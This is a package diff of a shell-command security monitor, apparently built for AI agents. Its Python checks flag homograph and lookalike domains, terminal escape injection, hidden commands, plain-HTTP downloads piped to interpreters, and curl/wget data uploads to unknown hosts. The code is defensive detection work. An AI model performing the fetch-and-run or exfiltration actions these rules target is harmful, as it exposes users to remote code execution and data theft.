@contextfort-ai/openclaw-secure 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bin/openclaw-secure.js +101 -0
- package/monitor/analytics.js +60 -0
- package/monitor/analytics.py +62 -0
- package/monitor/bash_guard/__init__.py +7 -0
- package/monitor/bash_guard/checker.py +13 -0
- package/monitor/bash_guard/checks/__init__.py +110 -0
- package/monitor/bash_guard/checks/command_shape.py +84 -0
- package/monitor/bash_guard/checks/ecosystem.py +153 -0
- package/monitor/bash_guard/checks/environment.py +15 -0
- package/monitor/bash_guard/checks/hostname.py +183 -0
- package/monitor/bash_guard/checks/path.py +57 -0
- package/monitor/bash_guard/checks/terminal.py +44 -0
- package/monitor/bash_guard/checks/transport.py +155 -0
- package/monitor/bash_guard/checks/utils.py +93 -0
- package/monitor/bash_guard/data/confusables.txt +97 -0
- package/monitor/bash_guard/data/known_domains.csv +119 -0
- package/monitor/bash_guard/data.py +71 -0
- package/monitor/bash_guard/patterns.py +126 -0
- package/monitor/monitor.py +56 -0
- package/monitor/prompt_injection_guard/index.js +141 -0
- package/monitor/skills_guard/index.js +300 -0
- package/openclaw-secure.js +418 -0
- package/package.json +16 -0
|
@@ -0,0 +1,183 @@
|
|
|
1
|
+
import re
|
|
2
|
+
import regex
|
|
3
|
+
from ..patterns import (
|
|
4
|
+
LOOKALIKE_TLDS,
|
|
5
|
+
INVALID_HOST_CHARS,
|
|
6
|
+
UNICODE_DOTS,
|
|
7
|
+
)
|
|
8
|
+
from ..data import get_known_domains, skeleton, is_known_domain
|
|
9
|
+
from .utils import levenshtein, extract_host_from_url
|
|
10
|
+
|
|
11
|
+
|
|
12
|
+
def check_non_ascii_hostname(command):
|
|
13
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
14
|
+
|
|
15
|
+
for url in urls:
|
|
16
|
+
host = extract_host_from_url(url)
|
|
17
|
+
if host and any(ord(c) > 127 for c in host):
|
|
18
|
+
return ("non_ascii_hostname", f"Non-ASCII characters in hostname: {host}")
|
|
19
|
+
|
|
20
|
+
return None
|
|
21
|
+
|
|
22
|
+
|
|
23
|
+
def check_mixed_script_in_label(command):
|
|
24
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
25
|
+
|
|
26
|
+
for url in urls:
|
|
27
|
+
host = extract_host_from_url(url)
|
|
28
|
+
if not host:
|
|
29
|
+
continue
|
|
30
|
+
|
|
31
|
+
for label in host.split("."):
|
|
32
|
+
if not label:
|
|
33
|
+
continue
|
|
34
|
+
|
|
35
|
+
scripts = set()
|
|
36
|
+
for char in label:
|
|
37
|
+
if char == "-" or char.isdigit():
|
|
38
|
+
continue
|
|
39
|
+
|
|
40
|
+
if regex.match(r'\p{Script=Latin}', char):
|
|
41
|
+
scripts.add('Latin')
|
|
42
|
+
elif regex.match(r'\p{Script=Cyrillic}', char):
|
|
43
|
+
scripts.add('Cyrillic')
|
|
44
|
+
elif regex.match(r'\p{Script=Greek}', char):
|
|
45
|
+
scripts.add('Greek')
|
|
46
|
+
elif regex.match(r'\p{Script=Han}', char):
|
|
47
|
+
scripts.add('Han')
|
|
48
|
+
elif regex.match(r'\p{Script=Hiragana}', char):
|
|
49
|
+
scripts.add('Hiragana')
|
|
50
|
+
elif regex.match(r'\p{Script=Katakana}', char):
|
|
51
|
+
scripts.add('Katakana')
|
|
52
|
+
elif regex.match(r'\p{Script=Arabic}', char):
|
|
53
|
+
scripts.add('Arabic')
|
|
54
|
+
elif regex.match(r'\p{Script=Hebrew}', char):
|
|
55
|
+
scripts.add('Hebrew')
|
|
56
|
+
|
|
57
|
+
if len(scripts) > 1:
|
|
58
|
+
return ("mixed_script_in_label", f"Mixed scripts in hostname label '{label}': {scripts}")
|
|
59
|
+
|
|
60
|
+
return None
|
|
61
|
+
|
|
62
|
+
|
|
63
|
+
def check_userinfo_trick(command):
|
|
64
|
+
urls = re.findall(r'https?://([^@/\s]+)@[^\s]+', command)
|
|
65
|
+
|
|
66
|
+
for userinfo in urls:
|
|
67
|
+
if "." in userinfo:
|
|
68
|
+
return ("userinfo_trick", f"Domain-like userinfo in URL: {userinfo}@...")
|
|
69
|
+
|
|
70
|
+
return None
|
|
71
|
+
|
|
72
|
+
|
|
73
|
+
def check_confusable_domain(command):
|
|
74
|
+
known_domains = get_known_domains()
|
|
75
|
+
if not known_domains:
|
|
76
|
+
return None
|
|
77
|
+
|
|
78
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
79
|
+
|
|
80
|
+
for url in urls:
|
|
81
|
+
host = extract_host_from_url(url)
|
|
82
|
+
if not host:
|
|
83
|
+
continue
|
|
84
|
+
|
|
85
|
+
host_lower = host.lower()
|
|
86
|
+
|
|
87
|
+
if host_lower in known_domains:
|
|
88
|
+
continue
|
|
89
|
+
|
|
90
|
+
host_skeleton = skeleton(host_lower)
|
|
91
|
+
|
|
92
|
+
for known in known_domains:
|
|
93
|
+
if host_skeleton == known and host_lower != known:
|
|
94
|
+
return ("confusable_domain", f"Domain '{host}' is visually similar to known domain '{known}'")
|
|
95
|
+
|
|
96
|
+
if len(known) >= 8:
|
|
97
|
+
len_diff = abs(len(host_lower) - len(known))
|
|
98
|
+
if len_diff <= 3 and levenshtein(host_lower, known) == 1:
|
|
99
|
+
return ("confusable_domain", f"Domain '{host}' is 1 edit from known domain '{known}'")
|
|
100
|
+
|
|
101
|
+
return None
|
|
102
|
+
|
|
103
|
+
|
|
104
|
+
def check_invalid_host_chars(command):
|
|
105
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
106
|
+
|
|
107
|
+
for url in urls:
|
|
108
|
+
host = extract_host_from_url(url)
|
|
109
|
+
if not host:
|
|
110
|
+
continue
|
|
111
|
+
|
|
112
|
+
for char in host:
|
|
113
|
+
if char in INVALID_HOST_CHARS:
|
|
114
|
+
return ("invalid_host_chars", f"Invalid character '{char}' in hostname")
|
|
115
|
+
if char in UNICODE_DOTS:
|
|
116
|
+
return ("invalid_host_chars", f"Unicode dot character in hostname: U+{ord(char):04X}")
|
|
117
|
+
if ord(char) < 0x20 or char.isspace():
|
|
118
|
+
return ("invalid_host_chars", "Control character or whitespace in hostname")
|
|
119
|
+
|
|
120
|
+
return None
|
|
121
|
+
|
|
122
|
+
|
|
123
|
+
def check_trailing_dot_whitespace(command):
|
|
124
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
125
|
+
|
|
126
|
+
for url in urls:
|
|
127
|
+
host = extract_host_from_url(url)
|
|
128
|
+
if not host:
|
|
129
|
+
continue
|
|
130
|
+
|
|
131
|
+
if host.endswith("."):
|
|
132
|
+
return ("trailing_dot_whitespace", "Trailing dot in hostname")
|
|
133
|
+
if host[-1:].isspace():
|
|
134
|
+
return ("trailing_dot_whitespace", "Trailing whitespace in hostname")
|
|
135
|
+
|
|
136
|
+
return None
|
|
137
|
+
|
|
138
|
+
|
|
139
|
+
def check_non_standard_port(command):
|
|
140
|
+
standard_ports = {80, 443, 22, 9418}
|
|
141
|
+
|
|
142
|
+
url_port_pattern = r'https?://([^:/\s]+):(\d+)'
|
|
143
|
+
matches = re.findall(url_port_pattern, command)
|
|
144
|
+
|
|
145
|
+
for host, port_str in matches:
|
|
146
|
+
try:
|
|
147
|
+
port = int(port_str)
|
|
148
|
+
except ValueError:
|
|
149
|
+
continue
|
|
150
|
+
|
|
151
|
+
if port in standard_ports:
|
|
152
|
+
continue
|
|
153
|
+
|
|
154
|
+
if is_known_domain(host.lower()):
|
|
155
|
+
return ("non_standard_port", f"Non-standard port {port} on known domain '{host}'")
|
|
156
|
+
|
|
157
|
+
return None
|
|
158
|
+
|
|
159
|
+
|
|
160
|
+
def check_lookalike_tld(command):
|
|
161
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
162
|
+
for url in urls:
|
|
163
|
+
host = url.split("://")[1].split("/")[0].split(":")[0].lower()
|
|
164
|
+
tld = host.rsplit(".", 1)[-1] if "." in host else ""
|
|
165
|
+
if tld in LOOKALIKE_TLDS:
|
|
166
|
+
return ("lookalike_tld", f"Lookalike TLD detected: .{tld}")
|
|
167
|
+
|
|
168
|
+
return None
|
|
169
|
+
|
|
170
|
+
|
|
171
|
+
def check_punycode_domain(command):
|
|
172
|
+
if "xn--" in command.lower():
|
|
173
|
+
return ("punycode_domain", "Punycode domain detected (potential homograph)")
|
|
174
|
+
|
|
175
|
+
return None
|
|
176
|
+
|
|
177
|
+
|
|
178
|
+
def check_raw_ip_url(command):
|
|
179
|
+
ipv4_pattern = r'https?://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
|
|
180
|
+
if re.search(ipv4_pattern, command):
|
|
181
|
+
return ("raw_ip_url", "URL uses raw IP address instead of domain")
|
|
182
|
+
|
|
183
|
+
return None
|
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
import re
|
|
2
|
+
from ..patterns import KNOWN_SENSITIVE_PATHS
|
|
3
|
+
from .utils import levenshtein
|
|
4
|
+
|
|
5
|
+
|
|
6
|
+
def check_non_ascii_path(command):
|
|
7
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
8
|
+
|
|
9
|
+
for url in urls:
|
|
10
|
+
try:
|
|
11
|
+
parts = url.split("://")[1].split("/", 1)
|
|
12
|
+
if len(parts) < 2:
|
|
13
|
+
continue
|
|
14
|
+
path = "/" + parts[1]
|
|
15
|
+
except IndexError:
|
|
16
|
+
continue
|
|
17
|
+
|
|
18
|
+
if any(ord(c) > 127 for c in path):
|
|
19
|
+
return ("non_ascii_path", "Non-ASCII characters in URL path")
|
|
20
|
+
|
|
21
|
+
return None
|
|
22
|
+
|
|
23
|
+
|
|
24
|
+
def check_homoglyph_in_path(command):
|
|
25
|
+
urls = re.findall(r'https?://[^\s]+', command)
|
|
26
|
+
|
|
27
|
+
for url in urls:
|
|
28
|
+
try:
|
|
29
|
+
path = url.split("://")[1].split("/", 1)
|
|
30
|
+
if len(path) < 2:
|
|
31
|
+
continue
|
|
32
|
+
path = "/" + path[1]
|
|
33
|
+
except IndexError:
|
|
34
|
+
continue
|
|
35
|
+
|
|
36
|
+
for segment in path.split("/"):
|
|
37
|
+
if not segment:
|
|
38
|
+
continue
|
|
39
|
+
|
|
40
|
+
has_ascii = any(c.isascii() and c.isalpha() for c in segment)
|
|
41
|
+
has_non_ascii = any(ord(c) > 127 for c in segment)
|
|
42
|
+
|
|
43
|
+
if has_ascii and has_non_ascii:
|
|
44
|
+
segment_lower = segment.lower()
|
|
45
|
+
for known in KNOWN_SENSITIVE_PATHS:
|
|
46
|
+
if levenshtein(segment_lower, known) <= 2:
|
|
47
|
+
return ("homoglyph_in_path", f"Potential homoglyph in path: '{segment}' looks like '{known}'")
|
|
48
|
+
|
|
49
|
+
return None
|
|
50
|
+
|
|
51
|
+
|
|
52
|
+
def check_double_encoding(command):
|
|
53
|
+
if "%25" in command:
|
|
54
|
+
if re.search(r'%25[0-9a-fA-F]{2}', command):
|
|
55
|
+
return ("double_encoding", "Double-encoded URL path detected (%25XX)")
|
|
56
|
+
|
|
57
|
+
return None
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
from ..patterns import (
|
|
2
|
+
BIDI_CONTROL_CHARS,
|
|
3
|
+
ZERO_WIDTH_CHARS,
|
|
4
|
+
HIDDEN_COMMAND_INDICATORS,
|
|
5
|
+
)
|
|
6
|
+
|
|
7
|
+
|
|
8
|
+
def check_terminal_injection(command):
|
|
9
|
+
if '\x1b[' in command or '\x1b]' in command or '\x1b_' in command or '\x1bP' in command:
|
|
10
|
+
return ("ansi_escapes", "ANSI escape sequences detected")
|
|
11
|
+
|
|
12
|
+
for char in command:
|
|
13
|
+
code = ord(char)
|
|
14
|
+
if code < 0x20 and char not in ('\n', '\t', '\x1b'):
|
|
15
|
+
return ("control_chars", f"Control character detected: 0x{code:02x}")
|
|
16
|
+
if code == 0x7f:
|
|
17
|
+
return ("control_chars", "DEL control character detected")
|
|
18
|
+
|
|
19
|
+
for char in command:
|
|
20
|
+
if char in BIDI_CONTROL_CHARS:
|
|
21
|
+
return ("bidi_controls", f"Bidirectional control character: U+{ord(char):04X}")
|
|
22
|
+
|
|
23
|
+
for char in command:
|
|
24
|
+
if char in ZERO_WIDTH_CHARS:
|
|
25
|
+
return ("zero_width_chars", f"Zero-width character: U+{ord(char):04X}")
|
|
26
|
+
|
|
27
|
+
return None
|
|
28
|
+
|
|
29
|
+
|
|
30
|
+
def check_hidden_multiline(command):
|
|
31
|
+
lines = command.split('\n')
|
|
32
|
+
if len(lines) <= 1:
|
|
33
|
+
return None
|
|
34
|
+
|
|
35
|
+
for i, line in enumerate(lines[1:], 1):
|
|
36
|
+
trimmed = line.strip()
|
|
37
|
+
if not trimmed:
|
|
38
|
+
continue
|
|
39
|
+
|
|
40
|
+
for indicator in HIDDEN_COMMAND_INDICATORS:
|
|
41
|
+
if indicator in trimmed:
|
|
42
|
+
return ("hidden_multiline", f"Hidden command on line {i+1}: {trimmed[:60]}")
|
|
43
|
+
|
|
44
|
+
return None
|
|
@@ -0,0 +1,155 @@
|
|
|
1
|
+
import re
|
|
2
|
+
from ..patterns import (
|
|
3
|
+
INTERPRETERS,
|
|
4
|
+
INSECURE_TLS_FLAGS,
|
|
5
|
+
URL_SHORTENERS,
|
|
6
|
+
CURL_UPLOAD_FLAGS,
|
|
7
|
+
WGET_UPLOAD_FLAGS,
|
|
8
|
+
)
|
|
9
|
+
from ..data import is_known_domain
|
|
10
|
+
from .utils import split_commands, extract_host_from_url
|
|
11
|
+
|
|
12
|
+
|
|
13
|
+
def check_insecure_tls_flags(command):
|
|
14
|
+
words = command.split()
|
|
15
|
+
for word in words:
|
|
16
|
+
clean = word.strip("'\"")
|
|
17
|
+
if clean in INSECURE_TLS_FLAGS:
|
|
18
|
+
return ("insecure_tls_flags", f"Insecure TLS flag: {clean}")
|
|
19
|
+
|
|
20
|
+
return None
|
|
21
|
+
|
|
22
|
+
|
|
23
|
+
def check_shortened_url(command):
|
|
24
|
+
command_lower = command.lower()
|
|
25
|
+
for shortener in URL_SHORTENERS:
|
|
26
|
+
if shortener in command_lower:
|
|
27
|
+
return ("shortened_url", f"Shortened URL detected: {shortener}")
|
|
28
|
+
|
|
29
|
+
return None
|
|
30
|
+
|
|
31
|
+
|
|
32
|
+
def _check_plain_http_to_sink_single(command):
|
|
33
|
+
"""Check a single command for plain HTTP piped to sink."""
|
|
34
|
+
if "http://" not in command.lower():
|
|
35
|
+
return None
|
|
36
|
+
|
|
37
|
+
if "|" not in command:
|
|
38
|
+
return None
|
|
39
|
+
|
|
40
|
+
parts = command.split("|")
|
|
41
|
+
for part in parts[1:]:
|
|
42
|
+
words = part.strip().split()
|
|
43
|
+
if words:
|
|
44
|
+
cmd = words[0].lower().rsplit("/", 1)[-1]
|
|
45
|
+
if cmd in INTERPRETERS or cmd in ("sudo", "env"):
|
|
46
|
+
return ("plain_http_to_sink", "Plain HTTP URL piped to interpreter")
|
|
47
|
+
|
|
48
|
+
return None
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
def check_plain_http_to_sink(command):
|
|
52
|
+
"""Check for plain HTTP to sink, handling && and ; separators."""
|
|
53
|
+
for subcmd in split_commands(command):
|
|
54
|
+
result = _check_plain_http_to_sink_single(subcmd)
|
|
55
|
+
if result:
|
|
56
|
+
return result
|
|
57
|
+
return None
|
|
58
|
+
|
|
59
|
+
|
|
60
|
+
def _check_schemeless_to_sink_single(command):
|
|
61
|
+
"""Check a single command for schemeless URL piped to sink."""
|
|
62
|
+
if "|" not in command:
|
|
63
|
+
return None
|
|
64
|
+
|
|
65
|
+
schemeless_pattern = r'(?<!\w://)(?<!\w://www\.)([a-zA-Z0-9][-a-zA-Z0-9]*\.[a-zA-Z]{2,})/\S+'
|
|
66
|
+
|
|
67
|
+
parts = command.split("|")
|
|
68
|
+
first_part = parts[0]
|
|
69
|
+
|
|
70
|
+
if re.search(schemeless_pattern, first_part):
|
|
71
|
+
for part in parts[1:]:
|
|
72
|
+
words = part.strip().split()
|
|
73
|
+
if words:
|
|
74
|
+
cmd = words[0].lower().rsplit("/", 1)[-1]
|
|
75
|
+
if cmd in INTERPRETERS or cmd in ("sudo", "env"):
|
|
76
|
+
return ("schemeless_to_sink", "Schemeless URL piped to interpreter")
|
|
77
|
+
|
|
78
|
+
return None
|
|
79
|
+
|
|
80
|
+
|
|
81
|
+
def check_schemeless_to_sink(command):
|
|
82
|
+
"""Check for schemeless URL to sink, handling && and ; separators."""
|
|
83
|
+
for subcmd in split_commands(command):
|
|
84
|
+
result = _check_schemeless_to_sink_single(subcmd)
|
|
85
|
+
if result:
|
|
86
|
+
return result
|
|
87
|
+
return None
|
|
88
|
+
|
|
89
|
+
|
|
90
|
+
_LOCALHOST_HOSTS = {"localhost", "127.0.0.1", "::1"}
|
|
91
|
+
|
|
92
|
+
|
|
93
|
+
def _check_curl_upload_single(command):
|
|
94
|
+
"""Check a single command for curl/wget uploading data to unknown hosts."""
|
|
95
|
+
words = command.split()
|
|
96
|
+
if not words:
|
|
97
|
+
return None
|
|
98
|
+
|
|
99
|
+
cmd = words[0].rsplit("/", 1)[-1].lower()
|
|
100
|
+
if cmd not in ("curl", "wget"):
|
|
101
|
+
return None
|
|
102
|
+
|
|
103
|
+
upload_flags = CURL_UPLOAD_FLAGS if cmd == "curl" else WGET_UPLOAD_FLAGS
|
|
104
|
+
|
|
105
|
+
has_upload_flag = False
|
|
106
|
+
for word in words[1:]:
|
|
107
|
+
clean = word.strip("'\"")
|
|
108
|
+
# Exact match: -d, --data, etc.
|
|
109
|
+
if clean in upload_flags:
|
|
110
|
+
has_upload_flag = True
|
|
111
|
+
break
|
|
112
|
+
# Prefix match for flag=value: --data=foo, --post-file=secrets.txt
|
|
113
|
+
for flag in upload_flags:
|
|
114
|
+
if clean.startswith(flag + "="):
|
|
115
|
+
has_upload_flag = True
|
|
116
|
+
break
|
|
117
|
+
if has_upload_flag:
|
|
118
|
+
break
|
|
119
|
+
|
|
120
|
+
if not has_upload_flag:
|
|
121
|
+
return None
|
|
122
|
+
|
|
123
|
+
# Extract URL and check host
|
|
124
|
+
for word in words[1:]:
|
|
125
|
+
clean = word.strip("'\"")
|
|
126
|
+
if re.match(r'https?://', clean, re.IGNORECASE):
|
|
127
|
+
host = extract_host_from_url(clean)
|
|
128
|
+
if not host:
|
|
129
|
+
continue
|
|
130
|
+
host_lower = host.lower()
|
|
131
|
+
if host_lower in _LOCALHOST_HOSTS:
|
|
132
|
+
return None
|
|
133
|
+
# Check full host first (e.g. api.github.com), then parent domain
|
|
134
|
+
if is_known_domain(host_lower):
|
|
135
|
+
return None
|
|
136
|
+
parts = host_lower.split(".")
|
|
137
|
+
if len(parts) > 2:
|
|
138
|
+
parent = ".".join(parts[-2:])
|
|
139
|
+
if is_known_domain(parent):
|
|
140
|
+
return None
|
|
141
|
+
return (
|
|
142
|
+
"curl_upload_to_unknown",
|
|
143
|
+
f"Data upload via {cmd} to unknown host: {host}",
|
|
144
|
+
)
|
|
145
|
+
|
|
146
|
+
return None
|
|
147
|
+
|
|
148
|
+
|
|
149
|
+
def check_curl_upload(command):
|
|
150
|
+
"""Check for curl/wget data uploads to unknown hosts, handling && and ; separators."""
|
|
151
|
+
for subcmd in split_commands(command):
|
|
152
|
+
result = _check_curl_upload_single(subcmd)
|
|
153
|
+
if result:
|
|
154
|
+
return result
|
|
155
|
+
return None
|
|
@@ -0,0 +1,93 @@
|
|
|
1
|
+
def split_commands(command):
|
|
2
|
+
"""
|
|
3
|
+
Split on && ; || while respecting quotes and escapes.
|
|
4
|
+
Note: Does not handle $() or () subshells.
|
|
5
|
+
"""
|
|
6
|
+
result = []
|
|
7
|
+
current = []
|
|
8
|
+
i = 0
|
|
9
|
+
in_single = False
|
|
10
|
+
in_double = False
|
|
11
|
+
|
|
12
|
+
while i < len(command):
|
|
13
|
+
char = command[i]
|
|
14
|
+
|
|
15
|
+
# Backslash escape (not in single quotes - they're literal there)
|
|
16
|
+
if char == '\\' and not in_single and i + 1 < len(command):
|
|
17
|
+
current.append(char)
|
|
18
|
+
current.append(command[i + 1])
|
|
19
|
+
i += 2
|
|
20
|
+
continue
|
|
21
|
+
|
|
22
|
+
if char == '"' and not in_single:
|
|
23
|
+
in_double = not in_double
|
|
24
|
+
current.append(char)
|
|
25
|
+
elif char == "'" and not in_double:
|
|
26
|
+
in_single = not in_single
|
|
27
|
+
current.append(char)
|
|
28
|
+
elif not in_single and not in_double:
|
|
29
|
+
if command[i:i+2] in ('&&', '||'):
|
|
30
|
+
if current:
|
|
31
|
+
result.append(''.join(current).strip())
|
|
32
|
+
current = []
|
|
33
|
+
i += 2
|
|
34
|
+
continue
|
|
35
|
+
elif char == ';':
|
|
36
|
+
if current:
|
|
37
|
+
result.append(''.join(current).strip())
|
|
38
|
+
current = []
|
|
39
|
+
else:
|
|
40
|
+
current.append(char)
|
|
41
|
+
else:
|
|
42
|
+
current.append(char)
|
|
43
|
+
i += 1
|
|
44
|
+
|
|
45
|
+
if current:
|
|
46
|
+
result.append(''.join(current).strip())
|
|
47
|
+
|
|
48
|
+
return [c for c in result if c] or [command]
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
def levenshtein(a, b):
|
|
52
|
+
m, n = len(a), len(b)
|
|
53
|
+
if m == 0:
|
|
54
|
+
return n
|
|
55
|
+
if n == 0:
|
|
56
|
+
return m
|
|
57
|
+
|
|
58
|
+
dp = [[0] * (n + 1) for _ in range(m + 1)]
|
|
59
|
+
for i in range(m + 1):
|
|
60
|
+
dp[i][0] = i
|
|
61
|
+
for j in range(n + 1):
|
|
62
|
+
dp[0][j] = j
|
|
63
|
+
|
|
64
|
+
for i in range(1, m + 1):
|
|
65
|
+
for j in range(1, n + 1):
|
|
66
|
+
cost = 0 if a[i-1] == b[j-1] else 1
|
|
67
|
+
dp[i][j] = min(
|
|
68
|
+
dp[i-1][j] + 1,
|
|
69
|
+
dp[i][j-1] + 1,
|
|
70
|
+
dp[i-1][j-1] + cost
|
|
71
|
+
)
|
|
72
|
+
|
|
73
|
+
return dp[m][n]
|
|
74
|
+
|
|
75
|
+
|
|
76
|
+
def extract_host_from_url(url):
|
|
77
|
+
try:
|
|
78
|
+
if "://" in url:
|
|
79
|
+
rest = url.split("://")[1]
|
|
80
|
+
else:
|
|
81
|
+
rest = url
|
|
82
|
+
|
|
83
|
+
if "@" in rest.split("/")[0]:
|
|
84
|
+
rest = rest.split("@")[-1]
|
|
85
|
+
|
|
86
|
+
host_part = rest.split("/")[0]
|
|
87
|
+
|
|
88
|
+
if ":" in host_part:
|
|
89
|
+
host_part = host_part.rsplit(":", 1)[0]
|
|
90
|
+
|
|
91
|
+
return host_part
|
|
92
|
+
except (IndexError, ValueError):
|
|
93
|
+
return None
|
|
@@ -0,0 +1,97 @@
|
|
|
1
|
+
# Subset of Unicode confusable characters relevant to URL security
|
|
2
|
+
# Format: confusable_codepoint target_codepoint # comment
|
|
3
|
+
# Based on Unicode TR39 confusables.txt
|
|
4
|
+
# Cyrillic -> Latin
|
|
5
|
+
0430 0061 # а -> a
|
|
6
|
+
0435 0065 # е -> e
|
|
7
|
+
043E 006F # о -> o
|
|
8
|
+
0440 0070 # р -> p
|
|
9
|
+
0441 0063 # с -> c
|
|
10
|
+
0443 0079 # у -> y
|
|
11
|
+
0445 0078 # х -> x
|
|
12
|
+
0456 0069 # і -> i
|
|
13
|
+
0458 006A # ј -> j
|
|
14
|
+
04BB 0068 # һ -> h
|
|
15
|
+
0410 0041 # А -> A
|
|
16
|
+
0412 0042 # В -> B
|
|
17
|
+
0415 0045 # Е -> E
|
|
18
|
+
041A 004B # К -> K
|
|
19
|
+
041C 004D # М -> M
|
|
20
|
+
041D 0048 # Н -> H
|
|
21
|
+
041E 004F # О -> O
|
|
22
|
+
0420 0050 # Р -> P
|
|
23
|
+
0421 0043 # С -> C
|
|
24
|
+
0422 0054 # Т -> T
|
|
25
|
+
0425 0058 # Х -> X
|
|
26
|
+
# Greek -> Latin
|
|
27
|
+
03B1 0061 # α -> a
|
|
28
|
+
03B5 0065 # ε -> e
|
|
29
|
+
03B9 0069 # ι -> i
|
|
30
|
+
03BF 006F # ο -> o
|
|
31
|
+
03C1 0070 # ρ -> p
|
|
32
|
+
03C5 0075 # υ -> u
|
|
33
|
+
03C7 0078 # χ -> x
|
|
34
|
+
# Fullwidth Latin
|
|
35
|
+
FF21 0041 # A -> A
|
|
36
|
+
FF22 0042 # B -> B
|
|
37
|
+
FF23 0043 # C -> C
|
|
38
|
+
FF24 0044 # D -> D
|
|
39
|
+
FF25 0045 # E -> E
|
|
40
|
+
FF26 0046 # F -> F
|
|
41
|
+
FF27 0047 # G -> G
|
|
42
|
+
FF28 0048 # H -> H
|
|
43
|
+
FF29 0049 # I -> I
|
|
44
|
+
FF2A 004A # J -> J
|
|
45
|
+
FF2B 004B # K -> K
|
|
46
|
+
FF2C 004C # L -> L
|
|
47
|
+
FF2D 004D # M -> M
|
|
48
|
+
FF2E 004E # N -> N
|
|
49
|
+
FF2F 004F # O -> O
|
|
50
|
+
FF30 0050 # P -> P
|
|
51
|
+
FF31 0051 # Q -> Q
|
|
52
|
+
FF32 0052 # R -> R
|
|
53
|
+
FF33 0053 # S -> S
|
|
54
|
+
FF34 0054 # T -> T
|
|
55
|
+
FF35 0055 # U -> U
|
|
56
|
+
FF36 0056 # V -> V
|
|
57
|
+
FF37 0057 # W -> W
|
|
58
|
+
FF38 0058 # X -> X
|
|
59
|
+
FF39 0059 # Y -> Y
|
|
60
|
+
FF3A 005A # Z -> Z
|
|
61
|
+
FF41 0061 # a -> a
|
|
62
|
+
FF42 0062 # b -> b
|
|
63
|
+
FF43 0063 # c -> c
|
|
64
|
+
FF44 0064 # d -> d
|
|
65
|
+
FF45 0065 # e -> e
|
|
66
|
+
FF46 0066 # f -> f
|
|
67
|
+
FF47 0067 # g -> g
|
|
68
|
+
FF48 0068 # h -> h
|
|
69
|
+
FF49 0069 # i -> i
|
|
70
|
+
FF4A 006A # j -> j
|
|
71
|
+
FF4B 006B # k -> k
|
|
72
|
+
FF4C 006C # l -> l
|
|
73
|
+
FF4D 006D # m -> m
|
|
74
|
+
FF4E 006E # n -> n
|
|
75
|
+
FF4F 006F # o -> o
|
|
76
|
+
FF50 0070 # p -> p
|
|
77
|
+
FF51 0071 # q -> q
|
|
78
|
+
FF52 0072 # r -> r
|
|
79
|
+
FF53 0073 # s -> s
|
|
80
|
+
FF54 0074 # t -> t
|
|
81
|
+
FF55 0075 # u -> u
|
|
82
|
+
FF56 0076 # v -> v
|
|
83
|
+
FF57 0077 # w -> w
|
|
84
|
+
FF58 0078 # x -> x
|
|
85
|
+
FF59 0079 # y -> y
|
|
86
|
+
FF5A 007A # z -> z
|
|
87
|
+
# Common lookalikes
|
|
88
|
+
0131 006C # ı -> l (dotless i looks like l)
|
|
89
|
+
0269 0069 # ɩ -> i
|
|
90
|
+
026A 0069 # ɪ -> i
|
|
91
|
+
1D00 0041 # ᴀ -> A (small cap)
|
|
92
|
+
029F 004C # ʟ -> L
|
|
93
|
+
0280 0052 # ʀ -> R
|
|
94
|
+
# Dot variants
|
|
95
|
+
FF0E 002E # . -> . (fullwidth dot)
|
|
96
|
+
3002 002E # 。 -> . (ideographic period)
|
|
97
|
+
FF61 002E # 。 -> . (halfwidth ideographic period)
|